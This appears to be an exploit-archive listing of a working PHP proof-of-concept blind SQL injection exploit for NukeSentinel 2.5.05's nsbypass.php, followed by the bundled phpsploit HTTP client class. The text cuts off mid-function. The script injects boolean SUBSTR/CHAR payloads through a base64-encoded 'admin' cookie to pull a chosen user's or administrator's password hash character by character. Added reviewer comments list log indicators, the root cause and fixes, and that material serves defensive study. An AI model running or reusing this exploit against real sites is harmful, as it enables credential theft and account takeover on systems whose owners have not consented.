
NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

🗓️ 22 Feb 2007 00:00:00 · Reported by RootType

Proof-of-concept exploit for a blind SQL injection in NukeSentinel 2.5.05 (nsbypass.php). The listing below documents the affected version, the CMS conditions it requires, and the script's usage and options.

Code

                                                #!/usr/bin/php
<?php
# Start-up: PHP notices are silenced, then the argument count is checked.
error_reporting(E_ALL&nbsp;^&nbsp;E_NOTICE);

#&nbsp;(changes.txt)
#
#&nbsp;2.5.05&nbsp;CHANGES&nbsp;(2007-01-22):
#&nbsp;+&nbsp;Includes&nbsp;IP2Country&nbsp;2007-01-19&nbsp;updated&nbsp;imports.
#&nbsp;&nbsp;&nbsp;-&nbsp;Both&nbsp;data&nbsp;and&nbsp;sql&nbsp;versions.&nbsp;(Not&nbsp;in&nbsp;upgrade&nbsp;package)
#&nbsp;+&nbsp;Moved&nbsp;nsbypass.php&nbsp;into&nbsp;the&nbsp;includes&nbsp;directory&nbsp;(Per&nbsp;User&nbsp;Requests).
#
#&nbsp;Prior&nbsp;versions&nbsp;may&nbsp;also&nbsp;be&nbsp;vulnerable&nbsp;but&nbsp;this&nbsp;exploit&nbsp;will&nbsp;not&nbsp;work
#&nbsp;for&nbsp;these&nbsp;versions&nbsp;(because&nbsp;the&nbsp;file&nbsp;\'nsbypass.php\'&nbsp;is&nbsp;not&nbsp;into&nbsp;the
#&nbsp;includes&nbsp;directory).
#

# With fewer than five argv entries the usage banner is printed and the script
# exits with status 1.
# Reviewer note (exposure triage): the banner states the conditions the author
# considers necessary -- NukeSentinel enabled (disable_switch<=0) and IP
# tracking on (track_active=1). Those two settings, plus the presence of
# includes/nsbypass.php, are what to check on an install running 2.5.05.
if($argc&nbsp;<&nbsp;5)&nbsp;{
print(\"
&nbsp;&nbsp;NukeSentinel&nbsp;2.5.05&nbsp;(nsbypass.php)&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit
------------------------------------------------------------------
PHP&nbsp;conditions:&nbsp;none
CMS&nbsp;conditions:&nbsp;disable_switch<=0&nbsp;(module&nbsp;activated),&nbsp;track_active=1
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Credits:&nbsp;DarkFig&nbsp;<[email protected]>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;http://www.acid-root.new.fr/
------------------------------------------------------------------
&nbsp;&nbsp;Usage:&nbsp;$argv[0]&nbsp;-url&nbsp;<url>&nbsp;-victim&nbsp;<username>&nbsp;[Opts]
Options:&nbsp;-isadmin&nbsp;&nbsp;&nbsp;Is&nbsp;the&nbsp;victim&nbsp;an&nbsp;Admin&nbsp;(1)&nbsp;or&nbsp;a&nbsp;normal&nbsp;user&nbsp;(default=0)&nbsp;?
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-prefix&nbsp;&nbsp;&nbsp;&nbsp;Table&nbsp;prefix&nbsp;(default=nuke)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-tid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;have&nbsp;already&nbsp;used&nbsp;this&nbsp;sploit
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-bf&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;You&nbsp;can&nbsp;precise&nbsp;how&nbsp;many&nbsp;hits&nbsp;we&nbsp;can&nbsp;try
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;wanna&nbsp;use&nbsp;a&nbsp;proxy&nbsp;<proxyhost:proxyport>&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxyauth&nbsp;Basic&nbsp;authentification&nbsp;<proxyuser:proxypwd>&nbsp;
------------------------------------------------------------------
\");&nbsp;exit(1);
}

# Command-line options. -url and -victim are mandatory (getparam(...,1) exits
# when they are absent); the remaining options fall back to the defaults on
# the right-hand side of each ternary.
$url&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'url\',1);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;http://localhost/php-nuke-7.9/html/
$login&nbsp;=&nbsp;getparam(\'victim\',1);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Default&nbsp;&nbsp;&nbsp;#&nbsp;Victim&nbsp;(root&nbsp;for&nbsp;example)
$admin&nbsp;=&nbsp;(getparam(\'isadmin\')!=\'\')&nbsp;?&nbsp;getparam(\'isadmin\')&nbsp;:&nbsp;0;
$prfix&nbsp;=&nbsp;(getparam(\'prefix\')!=\'\')&nbsp;&nbsp;?&nbsp;getparam(\'prefix\')&nbsp;&nbsp;:&nbsp;\'nuke\';
$tid&nbsp;&nbsp;&nbsp;=&nbsp;(getparam(\'tid\')!=\'\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\'tid\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;0;
$nbtst&nbsp;=&nbsp;(getparam(\'bf\')!=\'\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\'bf\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;10000;
$proxy&nbsp;=&nbsp;getparam(\'proxy\');
$authp&nbsp;=&nbsp;getparam(\'proxyauth\');

# HTTP client set-up; the proxy and its credentials are applied only when given.
# Reviewer note (detection): every request from this script carries the literal
# User-Agent "Mozilla Firefox", which can serve as a log indicator when
# reviewing access logs for hits on includes/nsbypass.php.
$xpl&nbsp;=&nbsp;new&nbsp;phpsploit();
$xpl->agent(\"Mozilla&nbsp;Firefox\");
if($proxy)&nbsp;$xpl->proxy($proxy);
if($authp)&nbsp;$xpl->proxyauth($authp);

#&nbsp;+nukesentinel.php
#&nbsp;49.&nbsp;&nbsp;if($ab_config[\'disable_switch\']&nbsp;>&nbsp;0)&nbsp;{&nbsp;return;&nbsp;}
#&nbsp;414.&nbsp;if($ab_config[\'track_active\']&nbsp;==&nbsp;1&nbsp;AND&nbsp;!is_excluded($nsnst_const[\'remote_ip\']))&nbsp;{
#&nbsp;458.&nbsp;$db->sql_query(\"INSERT&nbsp;INTO&nbsp;`\".$prefix.\"_nsnst_tracked_ips`&nbsp;(`user_id`,&nbsp;`username`,&nbsp;`date`,&nbsp;`ip_addr`,&nbsp;`ip_long`,&nbsp;`page`,
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`user_agent`,&nbsp;`refered_from`,&nbsp;`x_forward_for`,&nbsp;`client_ip`,&nbsp;`remote_addr`,&nbsp;`remote_port`,&nbsp;`request_method`,
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`c2c`)&nbsp;VALUES&nbsp;(\'\".$nsnst_const[\'ban_user_id\'].\"\',&nbsp;\'$ban_username2\',&nbsp;\'\".$nsnst_const[\'ban_time\'].\"\',&nbsp;
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'remote_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_long\'].\"\',&nbsp;\'$pg\',&nbsp;\'$user_agent\',&nbsp;\'$refered_from\',
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'forward_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'client_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_addr\'].\"\',
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'remote_port\'].\"\',&nbsp;\'\".$nsnst_const[\'request_method\'].\"\',&nbsp;\'$c2c\')\");
#
#&nbsp;We&nbsp;insert&nbsp;a&nbsp;row&nbsp;in&nbsp;$prefix.\"_nsnst_tracked_ips\".
#
# The statements below send a single GET to index.php with a Client-IP header
# of 255.255.255.255. The author relies on the tracking INSERT quoted above
# (nukesentinel.php line 458) to record that request as a tracked_ips row.
# Reviewer note (detection): an inbound Client-IP header with that value, and a
# matching row in <prefix>_nsnst_tracked_ips, are artefacts worth searching for
# when reviewing a site that ran this version with track_active=1.
print&nbsp;\"
Inserting&nbsp;a&nbsp;row&nbsp;in&nbsp;${prfix}_nsnst_tracked_ips\";
$xpl->addheader(\"Client-IP\",\"255.255.255.255\");
$xpl->get($url.\'index.php\');


# Probe loop: requests includes/nsbypass.php?tid=N for N from $tid up to $nbtst.
# Each request carries an `admin` cookie holding the url-encoded base64 of an
# always-true SQL condition followed by ":1:". A response whose headers do not
# contain "phpnuke.org" is treated as "this tid exists"; presumably the
# fallback redirect to $nuke_config['nukeurl'] (nsbypass.php lines 31-33, quoted
# further down) is what carries that string -- confirm against the target code.
# If the last candidate ($nbtst) also fails, the script exits with "#1".
# Reviewer note (detection): a run of consecutive tid values from one client to
# includes/nsbypass.php, each with an `admin` cookie that base64-decodes to text
# containing a quote and a `#`, is a high-signal pattern for log and WAF rules.
#&nbsp;Trying&nbsp;to&nbsp;find&nbsp;a&nbsp;valid&nbsp;tid.
#&nbsp;Needed&nbsp;for&nbsp;$tum&nbsp;>&nbsp;0.
#
print&nbsp;\"
Trying&nbsp;to&nbsp;find&nbsp;a&nbsp;valid&nbsp;tid&nbsp;(max&nbsp;hits=$nbtst)\";
$sql&nbsp;=&nbsp;\"\'&nbsp;OR&nbsp;1=1#\";
$xpl->addcookie(\"admin\",urlencode(base64_encode($sql.\':1:\')));
for($c=$tid;$c<=$nbtst;$c++)
{
&nbsp;&nbsp;&nbsp;&nbsp;$xpl->get($url.\"includes/nsbypass.php?tid=$c\");
&nbsp;&nbsp;&nbsp;&nbsp;if(!preg_match(\"#phpnuke.org#\",$xpl->getheader()))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;	$tid&nbsp;=&nbsp;$c;
&nbsp;&nbsp;&nbsp;&nbsp;	print&nbsp;\"
Valid&nbsp;tid&nbsp;found:&nbsp;$tid
Hash:&nbsp;$login&nbsp;->&nbsp;\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;if($c&nbsp;==&nbsp;$nbtst)&nbsp;exit(\"
#1&nbsp;Exploit&nbsp;failed\");
}


# Boolean-based recovery of a 32-character value, one position at a time: for
# each position $a the inner loop tries byte values 48..71 and prints the first
# one for which the response headers lack "phpnuke.org". Reaching 71 without a
# hit ends the script with "#2". With $admin set the condition targets the
# `pwd` column of the _authors query; otherwise it uses a sub-select on
# ${prfix}_users.user_password.
#
# Root cause, as shown by the nsbypass.php lines quoted inside the loop: the
# `admin` cookie is base64-decoded, split on ":" and its parts ($a_aid, $a_pas)
# are interpolated into the _authors query without escaping; only $tid is
# passed through intval().
#
# Reviewer note (mitigation): bind $a_aid and $a_pas as query parameters (or
# escape them with the database layer) in nsbypass.php, or remove the file if
# the bypass feature is unused. The script assumes the stored value is an MD5
# hash, so credentials on an affected install should be treated as exposed and
# rotated if these requests appear in logs.
# Reviewer note (detection): up to 24 requests per position over 32 positions,
# all to the same includes/nsbypass.php?tid=<n> URL and differing only in the
# `admin` cookie, is a distinctive burst in access logs.
#&nbsp;MD5&nbsp;hash&nbsp;length&nbsp;[32]
#
for($a=1;$a<=32;$a++)
{
	#&nbsp;MD5&nbsp;charset&nbsp;[a-f0-9]
	#
	for($b=48;$b<=71;$b++)
	{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;+nsbypass.php
		#&nbsp;24.&nbsp;$num&nbsp;=&nbsp;$db->sql_numrows($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_authors&nbsp;WHERE&nbsp;`aid`=\'$a_aid\'&nbsp;AND&nbsp;`pwd`=\'$a_pas\'\"));
		#&nbsp;25.&nbsp;$tum&nbsp;=&nbsp;$db->sql_numrows($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_nsnst_tracked_ips&nbsp;WHERE&nbsp;`tid`=\'$tid\'\"));
		#&nbsp;
		if($admin)&nbsp;$sql&nbsp;=&nbsp;\"$login\'&nbsp;AND&nbsp;SUBSTR(pwd,$a,1)=CHAR($b)#\";
		else&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sql&nbsp;=&nbsp;\"\'&nbsp;OR&nbsp;SUBSTR((SELECT&nbsp;user_password&nbsp;FROM&nbsp;${prfix}_users&nbsp;WHERE&nbsp;username=\'$login\'),$a,1)=CHAR($b)#\";
		
		#&nbsp;+nsbypass.php
		#&nbsp;16.&nbsp;$tid&nbsp;=&nbsp;intval($tid);
		#&nbsp;17.&nbsp;if(isset($_COOKIE[\'admin\'])&nbsp;&&&nbsp;!empty($_COOKIE[\'admin\']))&nbsp;{
		#&nbsp;18.&nbsp;$abadmin&nbsp;=&nbsp;base64_decode($_COOKIE[\'admin\']);
		#&nbsp;19.&nbsp;$abadmin&nbsp;=&nbsp;explode(\":\",&nbsp;$abadmin);
		#&nbsp;20.&nbsp;$a_aid&nbsp;=&nbsp;\"$abadmin[0]\";
		#&nbsp;21.&nbsp;$a_pas&nbsp;=&nbsp;\"$abadmin[1]\";
		#&nbsp;22.&nbsp;}
		#
		$xpl->addcookie(\"admin\",urlencode(base64_encode($sql.\':1:\')));
		$xpl->get($url.\"includes/nsbypass.php?tid=$tid\");

		#&nbsp;+nsbypass.php
		#&nbsp;27.&nbsp;if($num&nbsp;>&nbsp;0&nbsp;AND&nbsp;$tum&nbsp;>&nbsp;0)&nbsp;{
		#&nbsp;28.&nbsp;$row&nbsp;=&nbsp;$db->sql_fetchrow($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_nsnst_tracked_ips&nbsp;WHERE&nbsp;`tid`=\'$tid\'\"));
		#&nbsp;29.&nbsp;$row[\'refered_from\']&nbsp;=&nbsp;html_entity_decode($row[\'refered_from\'],&nbsp;ENT_QUOTES);
		#&nbsp;30.&nbsp;header(\"Location:&nbsp;\".$row[\'refered_from\']);
		#&nbsp;31.&nbsp;}&nbsp;else&nbsp;{
		#&nbsp;32.&nbsp;header(\"Location:&nbsp;\".$nuke_config[\'nukeurl\']);
		#&nbsp;33.&nbsp;}
		#
		if(!preg_match(\"#phpnuke.org#\",$xpl->getheader()))
		{
			print&nbsp;strtolower(chr($b));
			break;
		}
		
		#&nbsp;MD5&nbsp;hash&nbsp;do&nbsp;not&nbsp;contains&nbsp;g&nbsp;(char(71))&nbsp;...&nbsp;WTF&nbsp;!?
		#
		if($b&nbsp;==&nbsp;71)&nbsp;exit(\"
#2&nbsp;Exploit&nbsp;failed\");
	}
}


#&nbsp;-url&nbsp;\"http://www.victim.com/\"
#&nbsp;-url&nbsp;http://www.victim.com/
#&nbsp;getparam(\'url\',1)
#
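/**
 * Looks up the value that follows "-<param>" on the command line.
 *
 * Reads the global $argv. The comparison is strict, so two different
 * numeric-looking option names can no longer compare equal, and a flag that
 * is the last argument (no value after it) is treated as absent instead of
 * reading an undefined array offset.
 *
 * @param string $param Option name without the leading dash.
 * @param mixed  $opt   Truthy when the option is mandatory.
 * @return string|null  The option value, or null when an optional one is absent.
 *                      A missing mandatory option ends the script via exit().
 */
function getparam($param,$opt='')
{
	global $argv;

	$flag = '-'.$param;
	foreach($argv as $index => $arg)
	{
		// Only accept the flag when a value actually follows it.
		if($arg === $flag && isset($argv[$index+1])) return $argv[$index+1];
	}

	if($opt) exit("\n#3 -$param parameter required");
	return null;
}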

/*
&nbsp;*&nbsp;
&nbsp;*&nbsp;Copyright&nbsp;(C)&nbsp;darkfig
&nbsp;*&nbsp;
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp;
&nbsp;*&nbsp;modify&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;
&nbsp;*&nbsp;as&nbsp;published&nbsp;by&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;either&nbsp;version&nbsp;2&nbsp;
&nbsp;*&nbsp;of&nbsp;the&nbsp;License,&nbsp;or&nbsp;(at&nbsp;your&nbsp;option)&nbsp;any&nbsp;later&nbsp;version.&nbsp;
&nbsp;*&nbsp;
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,&nbsp;
&nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of&nbsp;
&nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the&nbsp;
&nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.&nbsp;
&nbsp;*&nbsp;
&nbsp;*&nbsp;You&nbsp;should&nbsp;have&nbsp;received&nbsp;a&nbsp;copy&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;
&nbsp;*&nbsp;along&nbsp;with&nbsp;this&nbsp;program;&nbsp;if&nbsp;not,&nbsp;write&nbsp;to&nbsp;the&nbsp;Free&nbsp;Software&nbsp;
&nbsp;*&nbsp;Foundation,&nbsp;Inc.,&nbsp;59&nbsp;Temple&nbsp;Place&nbsp;-&nbsp;Suite&nbsp;330,&nbsp;Boston,&nbsp;MA&nbsp;&nbsp;02111-1307,&nbsp;USA.
&nbsp;*&nbsp;
&nbsp;*&nbsp;TITLE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PhpSploit&nbsp;Class
&nbsp;*&nbsp;REQUIREMENTS:&nbsp;&nbsp;&nbsp;PHP&nbsp;5&nbsp;(remove&nbsp;\"private\",&nbsp;\"public\"&nbsp;if&nbsp;you&nbsp;have&nbsp;PHP&nbsp;4)
&nbsp;*&nbsp;VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.2
&nbsp;*&nbsp;LICENSE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License
&nbsp;*&nbsp;ORIGINAL&nbsp;URL:&nbsp;&nbsp;&nbsp;http://www.acid-root.new.fr/tools/03061230.txt
&nbsp;*&nbsp;FILENAME:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;phpsploitclass.php
&nbsp;*
&nbsp;*&nbsp;CONTACT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[email protected]&nbsp;(french&nbsp;/&nbsp;english)
&nbsp;*&nbsp;GREETZ:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sparah,&nbsp;Ddx39
&nbsp;*
&nbsp;*&nbsp;DESCRIPTION:
&nbsp;*&nbsp;The&nbsp;phpsploit&nbsp;is&nbsp;a&nbsp;class&nbsp;implementing&nbsp;a&nbsp;web&nbsp;user&nbsp;agent.
&nbsp;*&nbsp;You&nbsp;can&nbsp;add&nbsp;cookies,&nbsp;headers,&nbsp;use&nbsp;a&nbsp;proxy&nbsp;server&nbsp;with&nbsp;(or&nbsp;without)&nbsp;a
&nbsp;*&nbsp;basic&nbsp;authentification.&nbsp;It&nbsp;supports&nbsp;the&nbsp;GET&nbsp;and&nbsp;the&nbsp;POST&nbsp;method.&nbsp;It&nbsp;can
&nbsp;*&nbsp;also&nbsp;be&nbsp;used&nbsp;like&nbsp;a&nbsp;browser&nbsp;with&nbsp;the&nbsp;cookiejar()&nbsp;function&nbsp;(which&nbsp;allow
&nbsp;*&nbsp;a&nbsp;server&nbsp;to&nbsp;add&nbsp;several&nbsp;cookies&nbsp;for&nbsp;the&nbsp;next&nbsp;requests)&nbsp;and&nbsp;the
&nbsp;*&nbsp;allowredirection()&nbsp;function&nbsp;(which&nbsp;allow&nbsp;the&nbsp;script&nbsp;to&nbsp;follow&nbsp;all
&nbsp;*&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server).&nbsp;It&nbsp;can&nbsp;return&nbsp;the&nbsp;content&nbsp;(or&nbsp;the
&nbsp;*&nbsp;headers)&nbsp;of&nbsp;the&nbsp;request.&nbsp;Others&nbsp;useful&nbsp;functions&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;debugging.
&nbsp;*&nbsp;A&nbsp;manual&nbsp;is&nbsp;actually&nbsp;in&nbsp;development&nbsp;but&nbsp;to&nbsp;know&nbsp;how&nbsp;to&nbsp;use&nbsp;it,&nbsp;you&nbsp;can
&nbsp;*&nbsp;read&nbsp;the&nbsp;comments.
&nbsp;*
&nbsp;*&nbsp;CHANGELOG:
&nbsp;*&nbsp;[2007-01-24]&nbsp;(1.2)
&nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#2&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;getcookie()&nbsp;function&nbsp;((|;))
&nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;multipart/form-data&nbsp;enctype&nbsp;is&nbsp;now&nbsp;supported&nbsp;
&nbsp;*
&nbsp;*&nbsp;[2006-12-31]&nbsp;(1.1)
&nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#1&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;allowredirection()&nbsp;function&nbsp;(chr(13)&nbsp;bug)
&nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;You&nbsp;can&nbsp;now&nbsp;call&nbsp;the&nbsp;getheader()&nbsp;/&nbsp;getcontent()&nbsp;function&nbsp;without&nbsp;parameters
&nbsp;*
&nbsp;*&nbsp;[2006-12-30]&nbsp;(1.0)
&nbsp;*&nbsp;&nbsp;*&nbsp;First&nbsp;version
&nbsp;*&nbsp;
&nbsp;*/

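/**
 * Minimal HTTP/1.1 user agent over a raw socket (GET, POST, multipart POST),
 * with optional proxy, basic proxy authentication, a cookie jar and redirect
 * following.
 *
 * Review changes in this version: the regular expressions and CRLF line
 * endings that the page extraction had stripped are restored; state is held
 * in declared properties; array keys are quoted; the removed eregi() call is
 * replaced; cookie and header names are quoted before being used in
 * patterns; inputs that do not parse no longer recurse without end; the
 * cookiejar()/allowredirection() toggles no longer fall through into the
 * processing branch; redirect following is capped.
 *
 * Note for callers: header and cookie values are written into the request
 * verbatim, so values containing CR or LF would add request lines.
 */
class phpsploit {

    /** Upper bound on redirects followed for one request. */
    const MAX_REDIRECTS = 10;

    // Target and request state (public, as the implicit properties were).
    public $host = '';
    public $port = 80;
    public $path = '/';
    public $url = '';
    public $method = '';
    public $data = '';
    public $boundary = '';
    public $packet = '';
    public $recv = '';

    // Request decoration.
    public $header = '';
    public $cookie = '';
    public $agent = '';

    // Proxy settings.
    public $proxyhost = '';
    public $proxyport = 0;
    public $proxyuser = '';
    public $proxypass = '';

    // Feature switches: '' means off, 1 means on.
    public $cookiejar = '';
    public $allowredirection = '';

    // Number of redirects followed for the request in progress.
    private $redirects = 0;

    /**
     * Builds the request from the current state, sends it and reads the whole
     * response. Called by get(), post() and formdata().
     *
     * @return string Raw response, or the final response when redirects are followed.
     */
    private function sock()
    {
        $eol = "\r\n";

        // Validate the method before opening a socket so nothing is leaked on error.
        if ($this->method === "get") $verb = "GET";
        elseif ($this->method === "post" or $this->method === "formdata") $verb = "POST";
        else die("Error: Invalid method");

        if (!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost, $this->proxyport);
        else $socket = fsockopen($this->host, $this->port);

        if (!$socket) die("Error: The host doesn't exist");

        $this->packet = $verb." ".$this->url." HTTP/1.1".$eol;

        if (!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass).$eol;
        $this->packet .= "Host: ".$this->host.$eol;

        if (!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent.$eol;
        if (!empty($this->header)) $this->packet .= $this->header.$eol;
        if (!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie.$eol;

        $this->packet .= "Connection: Close".$eol;
        if ($this->method === "post")
        {
            $this->packet .= "Content-Type: application/x-www-form-urlencoded".$eol;
            $this->packet .= "Content-Length: ".strlen($this->data).$eol.$eol;
            $this->packet .= $this->data.$eol;
        }
        elseif ($this->method === "formdata")
        {
            $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary.$eol;
            $this->packet .= "Content-Length: ".strlen($this->data).$eol.$eol;
            $this->packet .= $this->data;
        }
        $this->packet .= $eol;
        $this->recv = '';

        fputs($socket, $this->packet);
        while (!feof($socket))
        {
            $chunk = fgets($socket);
            // A failed read must end the loop; feof() can stay false on errors.
            if ($chunk === false) break;
            $this->recv .= $chunk;
        }
        fclose($socket);

        if ($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
        if ($this->allowredirection) return $this->allowredirection($this->recv);
        return $this->recv;
    }


    /**
     * Adds or replaces cookies for the next requests.
     *
     * $this->addcookie("name","value");
     * $this->addcookie("name=newvalue");
     * $this->addcookie("othername=overvalue; xx=zz; y=u");
     *
     * The value "deleted" stores the cookie with an empty value.
     *
     * @param string $cookn Cookie name, or a whole "name=value; ..." string.
     * @param string $cookv Cookie value; leave empty to use the string form.
     */
    public function addcookie($cookn,$cookv='')
    {
        // Pair form: set or replace a single cookie.
        if ($cookv !== '' && $cookv !== null)
        {
            if ($cookv === "deleted") $cookv = '';
            if (empty($this->cookie))
            {
                $this->cookie = $cookn."=".$cookv.";";
                return;
            }

            // Quote the name and anchor it so "a" does not match inside "ba".
            $name = preg_quote($cookn, '/');
            if (preg_match("/(^|[; ])$name=/", $this->cookie))
            {
                // Escape "$" and "\" so the value is not read as a back-reference.
                $fresh = addcslashes($cookn."=".$cookv.";", '\\$');
                $this->cookie = preg_replace("/(^|[; ])$name=[^;]*;/", '${1}'.$fresh, $this->cookie);
            }
            else
            {
                $this->cookie .= " ".$cookn."=".$cookv.";";
            }
            return;
        }

        // String form with nothing stored yet: keep it as given, ";"-terminated.
        if (empty($this->cookie))
        {
            $this->cookie = (substr($cookn, -1) === ";") ? $cookn : $cookn.";";
            return;
        }

        // String form merged into existing cookies, one pair at a time.
        $list = preg_replace("/(.*);$/", "$1", (string) $cookn);
        foreach (explode(";", str_replace(" ", "", $list)) as $pair)
        {
            // Pairs without a name and a value are skipped rather than recursed on.
            if (!preg_match("/^([^=]+)=(.+)$/", $pair, $matches)) continue;
            $this->addcookie($matches[1], $matches[2]);
        }
    }


    /**
     * Adds or replaces request headers.
     *
     * $this->addheader("headername","headervalue");
     * $this->addheader("headername: headervalue");
     *
     * @param string $headern     Header name, or a whole "name: value" line.
     * @param string $headervalue Header value; leave empty to use the line form.
     */
    public function addheader($headern,$headervalue='')
    {
        // Pair form.
        if ($headervalue !== '' && $headervalue !== null)
        {
            if (empty($this->header))
            {
                $this->header = $headern.": ".$headervalue;
                return;
            }

            $name = preg_quote($headern, '/');
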